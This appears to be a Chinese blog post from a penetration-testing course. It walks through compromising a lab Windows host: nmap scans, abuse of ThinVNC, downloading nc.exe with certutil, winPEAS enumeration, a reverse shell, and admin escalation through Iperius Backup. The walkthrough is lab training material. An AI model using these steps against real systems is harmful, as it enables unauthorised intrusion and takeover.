滲透測試基本技術 第三章 (005)


Posted by nathan2009729 on 2023-03-26

試試這一台靶機:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p- 172.16.1.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 23:37 EDT
Nmap scan report for 172.16.1.112
Host is up (0.063s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 28.67 seconds

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nmap -p3389 -sC -sV -O -A 172.16.1.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-17 23:38 EDT
Nmap scan report for 172.16.1.112
Host is up (0.015s latency).

PORT     STATE SERVICE        VERSION
3389/tcp open  ms-wbt-server?
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Content-Type: text/html
|     Content-Length: 177
|     Connection: Keep-Alive
|     <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL nice%20ports%2C/Tri%6Eity.txt%2ebak was not found on this server.<P></BODY></HTML>
|   GetRequest:
|     HTTP/1.1 401 Access Denied
|     Content-Type: text/html
|     Content-Length: 144
|     Connection: Keep-Alive
|     WWW-Authenticate: Digest realm="ThinVNC", qop="auth", nonce="4I4ihm/55UCI1zECb/nlQA==", opaque="3WRbb2HCPYbAJLQID7pshR55ixhDf859iP"
|_    <HTML><HEAD><TITLE>401 Access Denied</TITLE></HEAD><BODY><H1>401 Access Denied</H1>The requested URL requires authorization.<P></BODY></HTML>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3389-TCP:V=7.93%I=7%D=3/17%Time=64153241%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,179,"HTTP/1\.1\x20401\x20Access\x20Denied\r\nContent-Type:\x20
SF:text/html\r\nContent-Length:\x20144\r\nConnection:\x20Keep-Alive\r\nWWW
SF:-Authenticate:\x20Digest\x20realm=\"ThinVNC\",\x20qop=\"auth\",\x20nonc
SF:e=\"4I4ihm/55UCI1zECb/nlQA==\",\x20opaque=\"3WRbb2HCPYbAJLQID7pshR55ixh
SF:Df859iP\"\r\n\r\n<HTML><HEAD><TITLE>401\x20Access\x20Denied</TITLE></HE
SF:AD><BODY><H1>401\x20Access\x20Denied</H1>The\x20requested\x20URL\x20\x2
SF:0requires\x20authorization\.<P></BODY></HTML>\r\n")%r(FourOhFourRequest
SF:,111,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Type:\x20text/html\r\
SF:nContent-Length:\x20177\r\nConnection:\x20Keep-Alive\r\n\r\n<HTML><HEAD
SF:><TITLE>404\x20Not\x20Found</TITLE></HEAD><BODY><H1>404\x20Not\x20Found
SF:</H1>The\x20requested\x20URL\x20nice%20ports%2C/Tri%6Eity\.txt%2ebak\x2
SF:0was\x20not\x20found\x20on\x20this\x20server\.<P></BODY></HTML>\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 (94%), Microsoft Windows 10 1607 (90%), Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1511 - 1607 (86%), Microsoft Windows 7 Professional (86%), Microsoft Windows 7 SP1 (85%), Tomato 1.27 - 1.28 (Linux 2.4.20) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   62.57 ms 192.168.200.1
2   12.16 ms 172.16.1.112

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.21 seconds

開啟burp suite:

因為3389有看到thinvnc字樣,所以看一下,只要打個.,就可以自己連自己:

想辦法叫出cmd,thinvnc這鬼東西真是超難用:

kali找一下reverse shell的檔案:

把windows用的nc複製過來:

下圖是windows版wget的用法,讓靶機windows下載上圖的nc.exe,方便reverse shell:

看看windows的話reverse shell要怎麼下:

同樣先監聽:

┌──(root㉿kali)-[~]
└─# nc -lvnp 8073
listening on [any] 8073 ...

把剛剛的指令複製貼上:

彈回:

┌──(root㉿kali)-[~]
└─# nc -lvnp 8073
listening on [any] 8073 ...
connect to [192.168.200.7] from (UNKNOWN) [172.16.1.112] 49675
Microsoft Windows [▒▒▒▒ 10.0.14393]
(c) 2016 Microsoft Corporation. ▒ۧ@▒v▒Ҧ▒▒A▒ëO▒d▒@▒▒▒v▒Q▒C

C:\Users\tinvnc>

getshell後,就是想辦法提權,真正的windows版wget:

複製:

一樣讓靶機下載下來:

C:\Users\tinvnc>certutil.exe -urlcache -f http://192.168.200.7/wget.exe wget.exe
certutil.exe -urlcache -f http://192.168.200.7/wget.exe wget.exe
****  ▒u▒W  ****
CertUtil: -URLCache ▒R▒O▒▒▒\▒▒▒▒▒C

C:\Users\tinvnc>dir
dir
 ▒Ϻа▒ C ▒▒▒▒▒ϺШS▒▒▒▒▒ҡC
 ▒ϺаϧǸ▒:  D0ED-0194

 C:\Users\tinvnc ▒▒▒ؿ▒

2023/03/18  ▒U▒▒ 12:26    <DIR>          .
2023/03/18  ▒U▒▒ 12:26    <DIR>          ..
2022/05/28  ▒U▒▒ 01:01    <DIR>          Contacts
2022/05/28  ▒U▒▒ 01:03    <DIR>          Desktop
2022/05/28  ▒U▒▒ 01:01    <DIR>          Documents
2022/05/28  ▒U▒▒ 01:02    <DIR>          Downloads
2022/05/28  ▒U▒▒ 01:01    <DIR>          Favorites
2022/05/28  ▒U▒▒ 01:01    <DIR>          Links
2022/05/28  ▒U▒▒ 01:01    <DIR>          Music
2023/03/18  ▒U▒▒ 12:14            59,392 nc.exe
2022/05/28  ▒U▒▒ 01:01    <DIR>          Pictures
2022/05/28  ▒U▒▒ 01:01    <DIR>          Saved Games
2022/05/28  ▒U▒▒ 01:01    <DIR>          Searches
2022/05/28  ▒U▒▒ 01:01    <DIR>          Videos
2023/03/18  ▒U▒▒ 12:26           308,736 wget.exe
               2 ▒▒▒ɮ▒         368,128 ▒줸▒▒
              13 ▒ӥؿ▒  124,339,032,064 ▒줸▒եi▒▒

下載windows專用枚舉工具:

下載windows專用枚舉工具:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe
--2023-03-18 00:31:19--  https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe
Resolving github.com (github.com)... 20.27.177.113
Connecting to github.com (github.com)|20.27.177.113|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github.com/carlospolop/PEASS-ng/releases/download/20230312/winPEASany_ofs.exe [following]
--2023-03-18 00:31:20--  https://github.com/carlospolop/PEASS-ng/releases/download/20230312/winPEASany_ofs.exe
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/d4b61227-dae6-43d4-bd06-2d71672d9f8c?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230318%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230318T043118Z&X-Amz-Expires=300&X-Amz-Signature=7cb6cdd41dda0ba80c1b3b9206ad1c0156a2762ee9597426e8a5f2f07fdc4c01&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3DwinPEASany_ofs.exe&response-content-type=application%2Foctet-stream [following]
--2023-03-18 00:31:20--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/d4b61227-dae6-43d4-bd06-2d71672d9f8c?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230318%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230318T043118Z&X-Amz-Expires=300&X-Amz-Signature=7cb6cdd41dda0ba80c1b3b9206ad1c0156a2762ee9597426e8a5f2f07fdc4c01&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3DwinPEASany_ofs.exe&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.108.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1834496 (1.7M) [application/octet-stream]
Saving to: ‘winPEASany_ofs.exe’

winPEASany_ofs.exe      100%[===============================>]   1.75M  4.51MB/s    in 0.4s

2023-03-18 00:31:21 (4.51 MB/s) - ‘winPEASany_ofs.exe’ saved [1834496/1834496]


┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv winPEASany_ofs.exe winpeas.exe

讓靶機下載下來:

C:\Users\tinvnc>wget http://192.168.200.7/winpeas.exe
wget http://192.168.200.7/winpeas.exe
--12:34:56--  http://192.168.200.7/winpeas.exe
           => `winpeas.exe'
Connecting to 192.168.200.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,834,496 [application/x-msdos-program]

    0K .......... .......... .......... .......... ..........  2%    1.04 MB/s
   50K .......... .......... .......... .......... ..........  5%    3.05 MB/s
  100K .......... .......... .......... .......... ..........  8%    3.26 MB/s
  150K .......... .......... .......... .......... .......... 11%    3.05 MB/s
  200K .......... .......... .......... .......... .......... 13%    3.26 MB/s
  250K .......... .......... .......... .......... .......... 16%    3.05 MB/s
  300K .......... .......... .......... .......... .......... 19%    3.05 MB/s
  350K .......... .......... .......... .......... .......... 22%   48.83 MB/s
  400K .......... .......... .......... .......... .......... 25%    3.05 MB/s
  450K .......... .......... .......... .......... .......... 27%    3.26 MB/s
  500K .......... .......... .......... .......... .......... 30%    3.05 MB/s
  550K .......... .......... .......... .......... .......... 33%    3.26 MB/s
  600K .......... .......... .......... .......... .......... 36%   48.83 MB/s
  650K .......... .......... .......... .......... .......... 39%    3.05 MB/s
  700K .......... .......... .......... .......... .......... 41%    3.05 MB/s
  750K .......... .......... .......... .......... .......... 44%    3.26 MB/s
  800K .......... .......... .......... .......... .......... 47%   48.83 MB/s
  850K .......... .......... .......... .......... .......... 50%    3.05 MB/s
  900K .......... .......... .......... .......... .......... 53%    3.05 MB/s
  950K .......... .......... .......... .......... .......... 55%    3.05 MB/s
 1000K .......... .......... .......... .......... .......... 58%   48.83 MB/s
 1050K .......... .......... .......... .......... .......... 61%    2.87 MB/s
 1100K .......... .......... .......... .......... .......... 64%    3.05 MB/s
 1150K .......... .......... .......... .......... .......... 66%   48.83 MB/s
 1200K .......... .......... .......... .......... .......... 69%    3.05 MB/s
 1250K .......... .......... .......... .......... .......... 72%    3.05 MB/s
 1300K .......... .......... .......... .......... .......... 75%   48.83 MB/s
 1350K .......... .......... .......... .......... .......... 78%    3.05 MB/s
 1400K .......... .......... .......... .......... .......... 80%    3.26 MB/s
 1450K .......... .......... .......... .......... .......... 83%    3.05 MB/s
 1500K .......... .......... .......... .......... .......... 86%   48.83 MB/s
 1550K .......... .......... .......... .......... .......... 89%    3.26 MB/s
 1600K .......... .......... .......... .......... .......... 92%    3.05 MB/s
 1650K .......... .......... .......... .......... .......... 94%    3.05 MB/s
 1700K .......... .......... .......... .......... .......... 97%   48.83 MB/s
 1750K .......... .......... .......... .......... .         100%    2.53 MB/s

12:34:56 (3.70 MB/s) - `winpeas.exe' saved [1834496/1834496]


C:\Users\tinvnc>dir
dir
 ▒Ϻа▒ C ▒▒▒▒▒ϺШS▒▒▒▒▒ҡC
 ▒ϺаϧǸ▒:  D0ED-0194

 C:\Users\tinvnc ▒▒▒ؿ▒

2023/03/18  ▒U▒▒ 12:34    <DIR>          .
2023/03/18  ▒U▒▒ 12:34    <DIR>          ..
2022/05/28  ▒U▒▒ 01:01    <DIR>          Contacts
2022/05/28  ▒U▒▒ 01:03    <DIR>          Desktop
2022/05/28  ▒U▒▒ 01:01    <DIR>          Documents
2022/05/28  ▒U▒▒ 01:02    <DIR>          Downloads
2022/05/28  ▒U▒▒ 01:01    <DIR>          Favorites
2022/05/28  ▒U▒▒ 01:01    <DIR>          Links
2022/05/28  ▒U▒▒ 01:01    <DIR>          Music
2023/03/18  ▒U▒▒ 12:14            59,392 nc.exe
2022/05/28  ▒U▒▒ 01:01    <DIR>          Pictures
2022/05/28  ▒U▒▒ 01:01    <DIR>          Saved Games
2022/05/28  ▒U▒▒ 01:01    <DIR>          Searches
2022/05/28  ▒U▒▒ 01:01    <DIR>          Videos
2023/03/18  ▒U▒▒ 12:26           308,736 wget.exe
2023/03/12  ▒U▒▒ 12:31         1,834,496 winpeas.exe
               3 ▒▒▒ɮ▒       2,202,624 ▒줸▒▒
              13 ▒ӥؿ▒  124,335,992,832 ▒줸▒եi▒▒

執行:(winpeas的執行結果一樣太長所以不貼)

看看目前的執行程式:

C:\Users\tinvnc>tasklist
tasklist

▒M▒▒▒W▒▒                       PID ▒u▒@▒▒▒q▒W▒▒      ▒u▒@▒▒▒q #    RAM▒ϥζq
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          4 K
System                           4 Services                   0        140 K
smss.exe                       316 Services                   0      1,188 K
csrss.exe                      416 Services                   0      4,220 K
csrss.exe                      500 Console                    1      7,012 K
wininit.exe                    524 Services                   0      5,148 K
winlogon.exe                   556 Console                    1      9,044 K
services.exe                   636 Services                   0      8,080 K
lsass.exe                      652 Services                   0     13,536 K
svchost.exe                    744 Services                   0     19,472 K
svchost.exe                    816 Services                   0     10,460 K
dwm.exe                        904 Console                    1     56,152 K
svchost.exe                    936 Services                   0     50,936 K
svchost.exe                    944 Services                   0     11,736 K
svchost.exe                   1008 Services                   0     23,652 K
svchost.exe                    452 Services                   0     19,448 K
svchost.exe                    764 Services                   0      9,680 K
svchost.exe                   1220 Services                   0     19,904 K
svchost.exe                   1280 Services                   0     16,356 K
svchost.exe                   1356 Services                   0     20,020 K
svchost.exe                   1364 Services                   0      7,336 K
VSSVC.exe                     1408 Services                   0      7,892 K
svchost.exe                   1816 Services                   0      6,560 K
spoolsv.exe                   1904 Services                   0     15,604 K
svchost.exe                   1600 Services                   0     17,456 K
svchost.exe                   1884 Services                   0     20,320 K
MsMpEng.exe                   1964 Services                   0     86,220 K
svchost.exe                   1992 Services                   0      7,996 K
RuntimeBroker.exe             3248 Console                    1     20,356 K
sihost.exe                    3284 Console                    1     19,508 K
svchost.exe                   3316 Console                    1     19,496 K
taskhostw.exe                 3344 Console                    1     15,244 K
explorer.exe                  3652 Console                    1     84,224 K
ShellExperienceHost.exe       3876 Console                    1     57,128 K
SearchUI.exe                  3960 Console                    1     53,104 K
ThinVnc.exe                   3192 Console                    1     29,664 K
msdtc.exe                     3852 Services                   0      9,396 K
Taskmgr.exe                    436 Console                    1     37,820 K
cmd.exe                       4124 Console                    1      3,300 K
conhost.exe                   4752 Console                    1     22,888 K
svchost.exe                   4628 Services                   0      7,196 K
nc.exe                        2528 Console                    1      4,548 K
cmd.exe                       2876 Console                    1      3,964 K
tasklist.exe                  2000 Console                    1      7,920 K
WmiPrvSE.exe                  4136 Services                   0      8,504 K

要注意msdtc.exe。另外的方式:

C:\Users\tinvnc>cd /
cd /

C:\>dir
dir
 ▒Ϻа▒ C ▒▒▒▒▒ϺШS▒▒▒▒▒ҡC
 ▒ϺаϧǸ▒:  D0ED-0194

 C:\ ▒▒▒ؿ▒

2016/07/16  ▒U▒▒ 09:23    <DIR>          PerfLogs
2016/11/23  ▒W▒▒ 07:19    <DIR>          Program Files
2022/05/28  ▒U▒▒ 01:43    <DIR>          Program Files (x86)
2022/05/28  ▒U▒▒ 01:01    <DIR>          Users
2022/05/28  ▒U▒▒ 12:56    <DIR>          Windows
               0 ▒▒▒ɮ▒               0 ▒줸▒▒
               5 ▒ӥؿ▒  124,335,771,648 ▒줸▒եi▒▒

C:\>cd "program files"
cd "program files"

C:\Program Files>dir
dir
 ▒Ϻа▒ C ▒▒▒▒▒ϺШS▒▒▒▒▒ҡC
 ▒ϺаϧǸ▒:  D0ED-0194

 C:\Program Files ▒▒▒ؿ▒

2016/11/23  ▒W▒▒ 07:19    <DIR>          .
2016/11/23  ▒W▒▒ 07:19    <DIR>          ..
2016/07/16  ▒U▒▒ 09:23    <DIR>          Common Files
2016/11/23  ▒W▒▒ 07:09    <DIR>          Internet Explorer
2016/11/23  ▒W▒▒ 06:40    <DIR>          Windows Defender
2016/11/23  ▒W▒▒ 07:09    <DIR>          Windows Mail
2016/11/23  ▒W▒▒ 07:09    <DIR>          Windows Media Player
2016/07/16  ▒U▒▒ 09:23    <DIR>          Windows Multimedia Platform
2016/07/16  ▒U▒▒ 09:23    <DIR>          Windows NT
2016/11/23  ▒W▒▒ 07:09    <DIR>          Windows Photo Viewer
2016/07/16  ▒U▒▒ 09:23    <DIR>          Windows Portable Devices
2016/07/16  ▒U▒▒ 09:23    <DIR>          WindowsPowerShell
               0 ▒▒▒ɮ▒               0 ▒줸▒▒
              12 ▒ӥؿ▒  124,335,771,648 ▒줸▒եi▒▒

C:\Program Files>cd ..
cd ..

C:\>cd "program files(x86)"
cd "program files(x86)"
▒t▒Χ䤣▒▒▒w▒▒▒▒|▒C

C:\>cd "program files (x86)"
cd "program files (x86)"

C:\Program Files (x86)>dir
dir
 ▒Ϻа▒ C ▒▒▒▒▒ϺШS▒▒▒▒▒ҡC
 ▒ϺаϧǸ▒:  D0ED-0194

 C:\Program Files (x86) ▒▒▒ؿ▒

2022/05/28  ▒U▒▒ 01:43    <DIR>          .
2022/05/28  ▒U▒▒ 01:43    <DIR>          ..
2016/07/16  ▒U▒▒ 09:23    <DIR>          Common Files
2016/11/23  ▒W▒▒ 07:09    <DIR>          Internet Explorer
2022/05/28  ▒U▒▒ 01:43    <DIR>          Iperius Backup
2016/07/16  ▒U▒▒ 09:23    <DIR>          Microsoft.NET
2016/11/23  ▒W▒▒ 06:40    <DIR>          Windows Defender
2016/11/23  ▒W▒▒ 07:09    <DIR>          Windows Mail
2016/11/23  ▒W▒▒ 07:09    <DIR>          Windows Media Player
2016/07/16  ▒U▒▒ 09:23    <DIR>          Windows Multimedia Platform
2016/07/16  ▒U▒▒ 09:23    <DIR>          Windows NT
2016/11/23  ▒W▒▒ 07:09    <DIR>          Windows Photo Viewer
2016/07/16  ▒U▒▒ 09:23    <DIR>          Windows Portable Devices
2016/07/16  ▒U▒▒ 09:23    <DIR>          WindowsPowerShell
               0 ▒▒▒ɮ▒               0 ▒줸▒▒
              14 ▒ӥؿ▒  124,335,771,648 ▒줸▒եi▒▒

C:\Program Files (x86)>cd "Iperius Backup"
cd "Iperius Backup"

C:\Program Files (x86)\Iperius Backup>dir
dir
 ▒Ϻа▒ C ▒▒▒▒▒ϺШS▒▒▒▒▒ҡC
 ▒ϺаϧǸ▒:  D0ED-0194

 C:\Program Files (x86)\Iperius Backup ▒▒▒ؿ▒

2022/05/28  ▒U▒▒ 01:43    <DIR>          .
2022/05/28  ▒U▒▒ 01:43    <DIR>          ..
2019/04/16  ▒U▒▒ 05:55         1,338,504 complib.dll
2019/05/11  ▒U▒▒ 06:05        69,393,648 Iperius.exe
2019/05/11  ▒U▒▒ 06:05         9,575,696 IperiusService.exe
2019/04/16  ▒U▒▒ 05:55            48,060 License_Eng.rtf
2022/05/28  ▒U▒▒ 01:43             5,633 unins000.dat
2022/05/28  ▒U▒▒ 01:43         1,244,952 unins000.exe
2022/05/28  ▒U▒▒ 01:43            22,831 unins000.msg
2017/02/06  ▒U▒▒ 06:48           386,744 UninstallerEx.exe
               8 ▒▒▒ɮ▒      82,016,068 ▒줸▒▒
               2 ▒ӥؿ▒  124,335,669,248 ▒줸▒եi▒▒

C:\Program Files (x86)\Iperius Backup>Iperius.exe
Iperius.exe

總之Iperius很可疑,先執行它:

打開:

照以下順序操作:

隨便選:

這裡也是隨便選:

也是隨便選:

這裡是重點:

外部文件的內容如下:

注意上面應該改成tinvnc,儲存如下:

反藍後右鍵,按下圖紅線處:

最瞎的地方是,即使不是管理員,還是可以用管理員權限執行任意檔案:

反彈,而且是管理員權限:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nc -lvnp 8074
listening on [any] 8074 ...
connect to [192.168.200.7] from (UNKNOWN) [172.16.1.112] 49679
Microsoft Windows [▒▒▒▒ 10.0.14393]
(c) 2016 Microsoft Corporation. ▒ۧ@▒v▒Ҧ▒▒A▒ëO▒d▒@▒▒▒v▒Q▒C

C:\Users\tinvnc>









Related Posts

ES6 解構賦值

ES6 解構賦值

資料庫系統介紹

資料庫系統介紹

讀書筆記-JavaScript技術手冊4: 物件進階語法

讀書筆記-JavaScript技術手冊4: 物件進階語法


Comments